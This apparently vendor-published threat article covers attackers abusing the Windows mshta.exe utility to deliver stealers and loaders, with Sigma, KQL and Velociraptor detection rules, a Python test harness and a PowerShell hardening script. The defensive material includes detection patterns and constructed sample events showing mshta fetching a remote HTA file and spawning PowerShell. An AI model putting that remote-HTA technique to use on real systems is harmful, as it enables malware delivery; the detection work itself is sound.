
MSHTA LOLBIN Abuse: Detecting Silent Stealers and Loaders via Legacy Windows Utility

Security Arsenal Team
May 19, 2026
6 min read

Introduction

Attackers are increasingly weaponizing mshta.exe (Microsoft HTML Application Host), a decades-old Windows utility, to deliver malware stealthily. Recent intelligence indicates a surge in adversaries abusing this trusted binary to deliver stealers, loaders, and persistent malicious software. Because mshta.exe is a signed OS component, its use can bypass basic application allow-listing and other security controls; the remaining hurdle for the attacker is getting a user to run it, which is done through social engineering and fake software downloads. Defenders must treat this living-off-the-land binary (LOLBIN) technique with high severity, as it provides a robust vector for initial access and execution that blends in with normal system activity.

Technical Analysis

Affected Platform: All versions of Microsoft Windows (Windows 7 through Windows 11/Server 2022) as mshta.exe is a built-in OS component.

Technique: LOLBIN (T1218.005)

Attack Vector: Attackers utilize mshta.exe to execute .hta (HTML Application) files or JavaScript/VBScript code encapsulated within HTML. The utility is frequently invoked via protocol handlers (e.g., mshta:http://) or by executing a malicious .hta file dropped via fake software installers.

Why It Works: mshta.exe is a signed Microsoft binary that is often allow-listed by default in application control policies. It can execute arbitrary script code, make network requests (C2 communication), and load malicious payloads directly into memory, in some cases without the payload ever touching disk.

Exploitation Status: Active exploitation is confirmed in the wild. Threat actors use this method to deliver commodity stealers (e.g., RedLine, Vidar) and sophisticated loaders, often chaining it with other LOLBINs to obfuscate the attack path.

Detection & Response

The following detection mechanisms focus on identifying abnormal mshta.exe execution patterns and child process relationships that are uncommon in legitimate business environments.

SIGMA Rules

---
title: MSHTA Execution with URL Argument
id: 4a3b1c2d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects mshta.exe executing with a URL argument, often indicative of remote payload delivery.
references:
  - https://attack.mitre.org/techniques/T1218/005/
author: Security Arsenal
date: 2024/05/20
tags:
  - attack.execution
  - attack.t1218.005
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\mshta.exe'
    CommandLine|contains: 'http'
  condition: selection
falsepositives:
  - Legacy internal applications requiring HTA access
level: high
---
title: MSHTA Spawning Child Process
id: 6b5c1d2e-7f8a-5b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects mshta.exe spawning suspicious child processes like PowerShell or CMD.
references:
  - https://attack.mitre.org/techniques/T1218/005/
author: Security Arsenal
date: 2024/05/20
tags:
  - attack.execution
  - attack.t1218.005
logsource:
  category: process_creation
  product: windows
detection:
  # In process_creation logs the parent and the child are fields of the same event,
  # so ParentImage and Image are matched in one selection. Two selections that each
  # match Image (one for mshta.exe, one for the child) can never both be true for
  # a single event and the rule would never fire.
  selection:
    ParentImage|endswith: '\mshta.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\cscript.exe'
      - '\wscript.exe'
      - '\regsvr32.exe'
  condition: selection
falsepositives:
  - Legacy internal applications
level: high
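To check the logic of the two Sigma rules above before deploying them, the following added example (not code from the original article) applies both rules to constructed Sysmon Event ID 1 style records using the Sigma process_creation field names (Image, CommandLine, ParentImage); the sample events and process IDs are constructed, not real telemetry.

```python
import re

# Child images that the second Sigma rule treats as suspicious under an mshta.exe parent
SCRIPT_HOSTS = ("\\powershell.exe", "\\cmd.exe", "\\cscript.exe", "\\wscript.exe", "\\regsvr32.exe")
# Case-insensitive, so an upper-case HTTPS:// on the command line is still caught
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def is_mshta(image: str) -> bool:
    return image.lower().endswith("\\mshta.exe")

def rule_url_argument(ev: dict) -> bool:
    """Rule 1: mshta.exe launched with an http(s) URL on its command line."""
    return is_mshta(ev.get("Image", "")) and bool(URL_RE.search(ev.get("CommandLine", "")))

def rule_suspicious_child(ev: dict) -> bool:
    """Rule 2: a script host whose ParentImage is mshta.exe (parent and child are fields of one event)."""
    return is_mshta(ev.get("ParentImage", "")) and ev.get("Image", "").lower().endswith(SCRIPT_HOSTS)

RULES = (("MSHTA Remote Execution", rule_url_argument),
         ("MSHTA Spawning Suspicious Child", rule_suspicious_child))

def triage(events):
    """Return (ProcessId, [rule titles]) for every event that fires at least one rule."""
    hits = []
    for ev in events:
        fired = [title for title, rule in RULES if rule(ev)]
        if fired:
            hits.append((ev["ProcessId"], fired))
    return hits

# Constructed sample events (not real telemetry): two true positives, two benign negatives
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe HTTPS://cdn.example.invalid/installer.hta",
     "ParentImage": r"C:\Users\jdoe\Downloads\FreeTool_Setup.exe"},
    {"ProcessId": 1002, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Users\jdoe\AppData\Local\Temp\stage.ps1",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"ProcessId": 1003, "Image": r"C:\Windows\System32\mshta.exe",   # legacy HTA from a local path, no URL
     "CommandLine": r'mshta.exe "C:\Program Files\LegacyApp\ui.hta"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 1004, "Image": r"C:\Windows\System32\cmd.exe",     # script host with a benign parent
     "CommandLine": "cmd.exe /c dir",
     "ParentImage": r"C:\Windows\explorer.exe"},
]
```

Calling `triage(SAMPLE_EVENTS)` flags only process IDs 1001 and 1002; the local-HTA and explorer-spawned cmd.exe events stay silent, which is the false-positive boundary the rules' `falsepositives` entries describe.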

KQL (Microsoft Sentinel / Defender)

// Hunt for MSHTA execution with network arguments or suspicious child processes
let lookback = 7d;
// Scenario 1: MSHTA executing with HTTP(s) arguments (Remote Payload).
// A regex is used because `has "http"` is a whole-term match and would miss https:// URLs.
DeviceProcessEvents
| where Timestamp > ago(lookback)
| where FileName =~ "mshta.exe"
| where ProcessCommandLine matches regex @"(?i)https?://"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| extend Detection = "MSHTA Remote Execution"
| union (
    // Scenario 2: MSHTA spawning PowerShell, CMD or other script hosts.
    // DeviceProcessEvents already carries the parent in the InitiatingProcess* columns,
    // so no self-join on a reusable ProcessId (and no unbounded right-hand table) is needed.
    DeviceProcessEvents
    | where Timestamp > ago(lookback)
    | where InitiatingProcessFileName =~ "mshta.exe"
    | where FileName in~ ("powershell.exe", "cmd.exe", "cscript.exe", "wscript.exe", "regsvr32.exe")
    | project Timestamp, DeviceName, AccountName, ParentProcessCommandLine = InitiatingProcessCommandLine, ChildProcessFileName = FileName, ChildProcessCommandLine = ProcessCommandLine
    | extend Detection = "MSHTA Spawning Suspicious Child"
)
| order by Timestamp desc

Velociraptor VQL

-- Snapshot the process list once and reuse it for both hunts
LET procs = SELECT Pid, Ppid, Name, CommandLine, Exe, Username, CreateTime
            FROM pslist()

-- Hunt 1: mshta.exe processes carrying an http(s) URL on the command line
-- (=~ is a regex match in VQL; (?i) makes it case-insensitive, [.] avoids escaping)
LET remote = SELECT Pid, Name, CommandLine, Exe, Username, CreateTime,
                    'MSHTA Remote Execution' AS Detection
             FROM procs
             WHERE Name =~ '(?i)^mshta[.]exe$'
               AND CommandLine =~ '(?i)https?://'

-- Hunt 2: mshta.exe parents with suspicious script-host children, joined on Ppid
-- (pslist() has no parent/child struct and VQL has no UNION, so foreach() does the lookup)
LET children = SELECT * FROM foreach(
    row={ SELECT Pid AS ParentPid, Name AS ParentName, CommandLine AS ParentCommandLine
          FROM procs WHERE Name =~ '(?i)^mshta[.]exe$' },
    query={ SELECT ParentPid, ParentName, ParentCommandLine,
                   Pid AS ChildPid, Name AS ChildName, CommandLine AS ChildCommandLine,
                   'MSHTA Spawning Suspicious Child' AS Detection
            FROM procs
            WHERE Ppid = ParentPid
              AND Name =~ '(?i)^(powershell|cmd|cscript|wscript)[.]exe$' })

-- chain() appends both result sets into one table
SELECT * FROM chain(a=remote, b=children)

Remediation Script (PowerShell)

#Requires -RunAsAdministrator
<#
.SYNOPSIS
    Audit and harden MSHTA usage.
.DESCRIPTION
    This script audits running MSHTA processes (including command line and parent PID)
    and enables the Microsoft Defender ASR rules this article associates with blocking
    MSHTA-based attack chains. Add-MpPreference is used so existing ASR rules are kept;
    Set-MpPreference would replace the whole rule list on each call, leaving only the last rule.
#>

Write-Host "[+] Checking for running MSHTA processes..." -ForegroundColor Cyan
# Win32_Process exposes CommandLine and ParentProcessId, which Get-Process does not
$mshtaProcesses = Get-CimInstance -ClassName Win32_Process -Filter "Name = 'mshta.exe'" -ErrorAction SilentlyContinue
if ($mshtaProcesses) {
    Write-Host "[!] WARNING: MSHTA is currently running:" -ForegroundColor Red
    $mshtaProcesses |
        Select-Object ProcessId, ParentProcessId, ExecutablePath, CommandLine |
        Format-Table -AutoSize -Wrap
    Write-Host "[?] Investigate these processes immediately. Terminating suspicious instances requires manual approval." -ForegroundColor Yellow
} else {
    Write-Host "[OK] No MSHTA processes currently detected." -ForegroundColor Green
}

Write-Host "`n[+] Configuring Defender Attack Surface Reduction (ASR) Rules..." -ForegroundColor Cyan

# Rule GUIDs and names as listed in the Remediation section of this article;
# confirm each GUID against Microsoft's ASR rule reference before deploying.
$asrRules = @(
    @{ Id = "3b576869-a4ec-4529-8536-b80a7769e899"; Name = "Block Office apps from creating child processes" },
    @{ Id = "d1e49aac-8f56-4280-b9ba-993a6d77475c"; Name = "Block Office apps from creating executable content" },
    @{ Id = "BE9BA2D9-53EA-4DCF-8329-D1A660D529FB"; Name = "Block JS/VB launching downloaded executables" }
)

foreach ($rule in $asrRules) {
    try {
        # -ErrorAction Stop turns the cmdlet's non-terminating errors into ones the catch block sees
        Add-MpPreference -AttackSurfaceReductionRules_Ids $rule.Id -AttackSurfaceReductionRules_Actions Enabled -ErrorAction Stop
        Write-Host "[OK] Enabled ASR: $($rule.Name)." -ForegroundColor Green
    } catch {
        Write-Host "[ERROR] Failed to enable ASR rule $($rule.Id) ($($rule.Name)). Ensure Defender is enabled and you are running as Administrator." -ForegroundColor Red
        Write-Host $_.Exception.Message
    }
}

# Show the resulting state so the change can be verified
Write-Host "`n[+] Currently configured ASR rule IDs:" -ForegroundColor Cyan
(Get-MpPreference).AttackSurfaceReductionRules_Ids | ForEach-Object { Write-Host "    $_" }

Write-Host "`n[+] Hardening Complete." -ForegroundColor Cyan

Remediation

1. Application Control (AppLocker/WDAC): The most effective mitigation is blocking mshta.exe entirely via Windows Defender Application Control (WDAC) or AppLocker. In most modern enterprise environments, mshta.exe is rarely required for legitimate business functions. Create a rule to deny execution of %windir%\System32\mshta.exe for standard users.

2. Attack Surface Reduction (ASR) Rules: Enable the following Microsoft Defender ASR rules immediately to disrupt common infection chains:

  • Block Office applications from creating child processes (GUID: 3b576869-a4ec-4529-8536-b80a7769e899)
  • Block Office applications from creating executable content (GUID: d1e49aac-8f56-4280-b9ba-993a6d77475c)
  • Block JavaScript or VBScript from launching downloaded executable content (GUID: BE9BA2D9-53EA-4DCF-8329-D1A660D529FB)

3. User Awareness: Since this vector relies heavily on social engineering and fake software downloads, reinforce user training regarding the risks of downloading software from unofficial sources and opening unexpected attachments.

4. Network Monitoring: Monitor and block outbound connections from mshta.exe to non-corporate IPs, as the utility rarely requires direct internet access in standard operations.
